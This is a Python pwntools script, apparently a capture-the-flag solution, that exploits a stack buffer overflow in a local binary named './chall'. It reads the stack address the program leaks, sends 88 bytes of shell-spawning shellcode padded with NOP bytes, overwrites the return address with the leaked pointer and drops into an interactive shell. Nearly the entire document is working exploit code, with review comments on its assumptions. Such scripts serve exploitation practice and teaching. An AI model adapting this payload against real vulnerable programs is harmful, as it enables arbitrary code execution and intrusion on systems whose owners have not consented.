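#!/usr/bin/python3
"""Stack-buffer overflow proof of concept for ./chall, driven with pwntools.

Flow: read the stack address the binary prints after ": ", send an
88-byte payload followed by that address, then hand the session to the
user.  The script depends on the target leaking its own stack address
and on the stack being executable; neither is verified here (the ELF is
loaded with checksec=False), so confirm both before relying on it.
"""
from pwn import *

# Loading the binary into context.binary also fixes arch/bits for asm()
# and p64() below.
context.binary = target = ELF("./chall", checksec=False)
r = process()

# Number of payload bytes written before the leaked pointer.
# NOTE(review): 88 is presumably the distance from the buffer start to
# the saved return address — confirm against the binary.
BUF_LEN = 88


# funcs
def s(a):
    """Send *a* to the target followed by a newline."""
    return r.sendline(a)


# leak: the target prints a hex stack address right after ": ".
r.recvuntil(b": ")
stack_addr = int(r.recvline(), 16)  # int() tolerates the trailing newline
log.info("stack_addr: %#x", stack_addr)

# buf: shellcode padded with 0x90 bytes up to BUF_LEN, then the leaked address.
sc = asm(shellcraft.sh())
if len(sc) > BUF_LEN:
    # The original computed a negative pad count, which bytes-multiply
    # silently turns into empty padding and misplaces the address.
    raise ValueError(f"shellcode is {len(sc)} bytes, larger than the {BUF_LEN}-byte slot")
sc += b"\x90" * (BUF_LEN - len(sc))
buf = sc
buf += p64(stack_addr)
s(buf)
r.interactive()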